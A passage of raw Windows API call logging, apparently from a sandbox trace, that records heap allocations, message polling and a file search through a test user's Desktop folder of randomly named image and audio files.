PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.441] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb0c0 | out: hHeap=0x650000) returned 1 [0073.441] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ba0 | out: hHeap=0x650000) returned 1 [0073.441] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c50 | out: hHeap=0x650000) returned 1 [0073.441] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.441] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb0c0 | out: hHeap=0x650000) returned 1 [0073.441] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ba0 | out: hHeap=0x650000) returned 1 [0073.441] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c50 | out: hHeap=0x650000) returned 1 [0073.441] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.441] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0073.441] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692d08 | out: hHeap=0x650000) returned 1 [0073.442] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bb0 | out: hHeap=0x650000) returned 1 [0073.442] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b378 | out: hHeap=0x650000) returned 1 [0073.442] PeekMessageW (in: lpMsg=0x61e4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e4d4) returned 0 [0073.442] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ca0 | out: hHeap=0x650000) returned 1 [0073.442] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ad0 | out: hHeap=0x650000) returned 1 [0073.442] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ca0 | out: hHeap=0x650000) returned 1 [0073.442] PeekMessageW (in: lpMsg=0x61e4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e4d4) returned 0 [0073.442] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c60 | out: hHeap=0x650000) returned 1 [0073.442] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NA3pEcvaltBR8VLK", cchCount1=16, lpString2="AppData", cchCount2=7) returned 3 [0073.442] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b318 | out: hHeap=0x650000) returned 1 [0073.442] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b2e8 | out: hHeap=0x650000) returned 1 [0073.442] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96e8 | out: hHeap=0x650000) returned 1 [0073.442] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ad0 | out: hHeap=0x650000) returned 1 [0073.442] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ca0 | out: hHeap=0x650000) returned 1 [0073.442] PeekMessageW (in: lpMsg=0x61e4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e4d4) returned 0 [0073.442] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8af8 | out: hHeap=0x650000) returned 1 [0073.442] PeekMessageW (in: lpMsg=0x61e4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e4d4) returned 0 [0073.442] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ca0 | out: hHeap=0x650000) returned 1 [0073.442] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b810 | out: hHeap=0x650000) returned 1 [0073.442] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de50 | out: hHeap=0x650000) returned 1 [0073.442] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c40 | out: hHeap=0x650000) returned 1 [0073.442] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68def0 | out: hHeap=0x650000) returned 1 [0073.442] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b300 | out: hHeap=0x650000) returned 1 [0073.442] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c00 | out: hHeap=0x650000) returned 1 [0073.442] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df18 | out: hHeap=0x650000) returned 1 [0073.442] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b348 | out: hHeap=0x650000) returned 1 [0073.442] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b378 | out: hHeap=0x650000) returned 1 [0073.442] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.442] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0073.443] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0073.443] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\*", lpFindFileData=0x61e0e8 | out: lpFindFileData=0x61e0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb4ff6880, ftCreationTime.dwHighDateTime=0x1d5df51, ftLastAccessTime.dwLowDateTime=0x458ca660, ftLastAccessTime.dwHighDateTime=0x1d5dc69, ftLastWriteTime.dwLowDateTime=0x458ca660, ftLastWriteTime.dwHighDateTime=0x1d5dc69, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName=".", cAlternateFileName="")) returned 0x6b8af8 [0073.443] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0e8 | out: lpFindFileData=0x61e0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb4ff6880, ftCreationTime.dwHighDateTime=0x1d5df51, ftLastAccessTime.dwLowDateTime=0x458ca660, ftLastAccessTime.dwHighDateTime=0x1d5dc69, ftLastWriteTime.dwLowDateTime=0x458ca660, ftLastWriteTime.dwHighDateTime=0x1d5dc69, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName="..", cAlternateFileName="")) returned 1 [0073.443] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0e8 | out: lpFindFileData=0x61e0e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4262450, ftCreationTime.dwHighDateTime=0x1d5def5, ftLastAccessTime.dwLowDateTime=0x8e9e2530, ftLastAccessTime.dwHighDateTime=0x1d5e74b, ftLastWriteTime.dwLowDateTime=0x8e9e2530, ftLastWriteTime.dwHighDateTime=0x1d5e74b, nFileSizeHigh=0x0, nFileSizeLow=0xbc0c, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName="E5mhIaTvFij2bqaC0v.gif", cAlternateFileName="E5MHIA~1.GIF")) returned 1 [0073.443] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0073.443] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0073.443] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0073.443] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0073.443] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0073.443] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0073.443] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0073.443] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0073.443] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0073.443] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3da0eaa0, ftCreationTime.dwHighDateTime=0x1d5d9bd, ftLastAccessTime.dwLowDateTime=0x47dd5440, ftLastAccessTime.dwHighDateTime=0x1d5e458, ftLastWriteTime.dwLowDateTime=0x47dd5440, ftLastWriteTime.dwHighDateTime=0x1d5e458, nFileSizeHigh=0x0, nFileSizeLow=0x8a16, dwReserved0=0x10, dwReserved1=0x657690, cFileName="JLQ6tYmOaaqJ7B5t.gif", cAlternateFileName="JLQ6TY~1.GIF")) returned 1 [0073.443] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0073.443] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0073.443] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0073.444] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0073.444] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0073.444] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0073.444] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f8ef0e0, ftCreationTime.dwHighDateTime=0x1d5e359, ftLastAccessTime.dwLowDateTime=0xb6fce980, ftLastAccessTime.dwHighDateTime=0x1d5ddcd, ftLastWriteTime.dwLowDateTime=0xb6fce980, ftLastWriteTime.dwHighDateTime=0x1d5ddcd, nFileSizeHigh=0x0, nFileSizeLow=0xefde, dwReserved0=0x10, dwReserved1=0x657690, cFileName="Kq7hl.bmp", cAlternateFileName="")) returned 1 [0073.444] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0073.444] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0073.444] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0073.444] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0073.444] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0073.444] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0073.444] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ee78cb0, ftCreationTime.dwHighDateTime=0x1d5d815, ftLastAccessTime.dwLowDateTime=0x3a5f2470, ftLastAccessTime.dwHighDateTime=0x1d5e4f2, ftLastWriteTime.dwLowDateTime=0x3a5f2470, ftLastWriteTime.dwHighDateTime=0x1d5e4f2, nFileSizeHigh=0x0, nFileSizeLow=0x53cf, dwReserved0=0x10, dwReserved1=0x657690, cFileName="SEObOseiAS.bmp", cAlternateFileName="SEOBOS~1.BMP")) returned 1 [0073.444] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0073.444] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0073.444] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0073.444] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0073.444] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0073.444] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0073.444] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x12c0069, ftCreationTime.dwLowDateTime=0xc2856, ftCreationTime.dwHighDateTime=0x63f910, ftLastAccessTime.dwLowDateTime=0x77cb1ecd, ftLastAccessTime.dwHighDateTime=0x1317ae, ftLastWriteTime.dwLowDateTime=0x13, ftLastWriteTime.dwHighDateTime=0x110006a, nFileSizeHigh=0xc2856, nFileSizeLow=0x6b9ac8, dwReserved0=0x10, dwReserved1=0x657690, cFileName="SE\x08", cAlternateFileName="haဓ\x03\x10")) returned 0 [0073.445] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0073.445] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0073.445] FindClose (in: hFindFile=0x6b8af8 | out: hFindFile=0x6b8af8) returned 1 [0073.445] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0073.445] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.445] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.445] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690bc0 [0073.445] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.445] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690bc0 [0073.445] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ddd8 [0073.445] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b2e8 [0073.445] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c10 [0073.445] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28da0830, ftCreationTime.dwHighDateTime=0x1d5dc11, ftLastAccessTime.dwLowDateTime=0x8d38b190, ftLastAccessTime.dwHighDateTime=0x1d5e405, ftLastWriteTime.dwLowDateTime=0x8d38b190, ftLastWriteTime.dwHighDateTime=0x1d5e405, nFileSizeHigh=0x0, nFileSizeLow=0xda2c, dwReserved0=0x657494, dwReserved1=0x657690, cFileName="oB O9kLZ7MPDb_Fa.mp3", cAlternateFileName="OBO9KL~1.MP3")) returned 1 [0073.445] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b300 [0073.445] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692d08 [0073.445] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c10 [0073.445] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.445] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c10 [0073.445] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0073.445] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690bc0 [0073.445] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.450] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c10 [0073.450] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0073.450] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690bc0 [0073.450] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.450] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c10 [0073.450] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b300 [0073.450] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690bc0 [0073.450] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0073.450] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b2e8 [0073.450] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690bb0 [0073.450] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x80) returned 0x6b9970 [0073.450] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.450] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.450] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690bb0 [0073.450] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.450] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690bb0 [0073.450] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ddd8 [0073.450] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b300 [0073.450] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c10 [0073.450] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b149f0, ftCreationTime.dwHighDateTime=0x1d5da5b, ftLastAccessTime.dwLowDateTime=0xd70c6520, ftLastAccessTime.dwHighDateTime=0x1d5e345, ftLastWriteTime.dwLowDateTime=0xd70c6520, ftLastWriteTime.dwHighDateTime=0x1d5e345, nFileSizeHigh=0x0, nFileSizeLow=0x800b, dwReserved0=0x10, dwReserved1=0x657690, cFileName="q4eGaKOHIBJ.png", cAlternateFileName="Q4EGAK~1.PNG")) returned 1 [0073.450] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b2e8 [0073.450] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de28 [0073.451] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c10 [0073.451] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.451] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c10 [0073.451] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0073.451] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690bb0 [0073.451] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.451] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c10 [0073.451] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0073.451] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690bb0 [0073.451] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.451] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c10 [0073.451] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b2e8 [0073.451] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690bb0 [0073.451] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0073.451] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b300 [0073.451] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690bc0 [0073.451] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x70) returned 0x764cc0 [0073.451] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.451] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.451] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690bc0 [0073.451] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.451] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690bc0 [0073.451] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de28 [0073.451] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b2e8 [0073.451] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c10 [0073.451] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf556c8a0, ftCreationTime.dwHighDateTime=0x1d5da4d, ftLastAccessTime.dwLowDateTime=0xfb4c46b0, ftLastAccessTime.dwHighDateTime=0x1d5e51d, ftLastWriteTime.dwLowDateTime=0xfb4c46b0, ftLastWriteTime.dwHighDateTime=0x1d5e51d, nFileSizeHigh=0x0, nFileSizeLow=0x1565f, dwReserved0=0x10, dwReserved1=0x657690, cFileName="R4ko9W2ZwNtIqWlJH0ER.gif", cAlternateFileName="R4KO9W~1.GIF")) returned 1 [0073.451] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b300 [0073.451] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b810 [0073.451] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c10 [0073.452] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.452] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c10 [0073.452] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0073.452] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690bc0 [0073.452] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.452] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c10 [0073.452] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0073.452] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690bc0 [0073.452] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.452] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c10 [0073.452] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b300 [0073.452] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690bc0 [0073.452] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0073.452] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b2e8 [0073.452] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690bb0 [0073.452] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x80) returned 0x6b9970 [0073.452] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.452] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0073.452] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690bb0 [0073.452] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, 